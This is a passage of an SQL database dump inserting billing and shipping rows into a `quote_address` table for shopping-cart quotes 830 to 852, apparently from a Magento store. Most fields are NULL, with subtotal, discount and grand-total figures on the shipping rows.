(1294, 830, '2026-03-31 18:29:19', '2026-03-31 18:29:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1295, 831, '2026-03-31 18:29:24', '2026-03-31 18:29:24', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1296, 831, '2026-03-31 18:29:24', '2026-03-31 18:29:24', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1297, 832, '2026-03-31 23:35:06', '2026-03-31 23:35:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1298, 832, '2026-03-31 23:35:06', '2026-03-31 23:35:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1299, 833, '2026-03-31 23:35:07', '2026-03-31 23:35:07', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1300, 833, '2026-03-31 23:35:07', '2026-03-31 23:35:07', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1301, 834, '2026-03-31 23:35:08', '2026-03-31 23:35:08', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1302, 834, '2026-03-31 23:35:08', '2026-03-31 23:35:08', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1303, 835, '2026-04-01 00:03:13', '2026-04-01 00:03:13', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1304, 835, '2026-04-01 00:03:13', '2026-04-01 00:03:13', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1305, 836, '2026-04-01 06:05:44', '2026-04-01 06:05:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1306, 836, '2026-04-01 06:05:44', '2026-04-01 06:05:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1307, 837, '2026-04-01 07:20:23', '2026-04-01 07:20:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1308, 837, '2026-04-01 07:20:23', '2026-04-01 07:20:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1309, 838, '2026-04-01 09:34:21', '2026-04-01 09:34:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1310, 838, '2026-04-01 09:34:21', '2026-04-01 09:34:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1311, 839, '2026-04-01 12:36:48', '2026-04-01 12:36:48', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1312, 839, '2026-04-01 12:36:48', '2026-04-01 12:36:48', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1313, 840, '2026-04-01 12:54:59', '2026-04-01 12:54:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1314, 840, '2026-04-01 12:54:59', '2026-04-01 12:54:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 321.0000, 321.0000, 256.8000, 256.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -64.2000, -64.2000, 256.8000, 256.8000, NULL, '[]', NULL, 0.0000, 0.0000, 321.0000, 321.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(1315, 841, '2026-04-01 12:55:06', '2026-04-01 12:55:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1316, 841, '2026-04-01 12:55:06', '2026-04-01 12:55:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1317, 842, '2026-04-01 12:55:07', '2026-04-01 12:55:07', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1318, 842, '2026-04-01 12:55:07', '2026-04-01 12:55:07', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1319, 843, '2026-04-01 12:55:09', '2026-04-01 12:55:09', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1320, 843, '2026-04-01 12:55:09', '2026-04-01 12:55:09', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1321, 844, '2026-04-01 12:55:10', '2026-04-01 12:55:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1322, 844, '2026-04-01 12:55:10', '2026-04-01 12:55:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1323, 845, '2026-04-01 12:55:12', '2026-04-01 12:55:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1324, 845, '2026-04-01 12:55:12', '2026-04-01 12:55:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1325, 846, '2026-04-01 12:55:13', '2026-04-01 12:55:13', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1326, 846, '2026-04-01 12:55:13', '2026-04-01 12:55:13', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1327, 847, '2026-04-01 12:55:14', '2026-04-01 12:55:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1328, 847, '2026-04-01 12:55:14', '2026-04-01 12:55:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1329, 848, '2026-04-01 12:55:16', '2026-04-01 12:55:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1330, 848, '2026-04-01 12:55:16', '2026-04-01 12:55:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(1331, 849, '2026-04-01 12:55:17', '2026-04-01 12:55:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1332, 849, '2026-04-01 12:55:17', '2026-04-01 12:55:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1333, 850, '2026-04-01 12:55:19', '2026-04-01 12:55:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1334, 850, '2026-04-01 12:55:19', '2026-04-01 12:55:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1335, 851, '2026-04-01 12:55:20', '2026-04-01 12:55:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1336, 851, '2026-04-01 12:55:20', '2026-04-01 12:55:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1337, 852, '2026-04-01 12:55:22', '2026-04-01 12:55:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(1338, 852, '2026-04-01 12:55:22', '2026-04-01 12:55:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
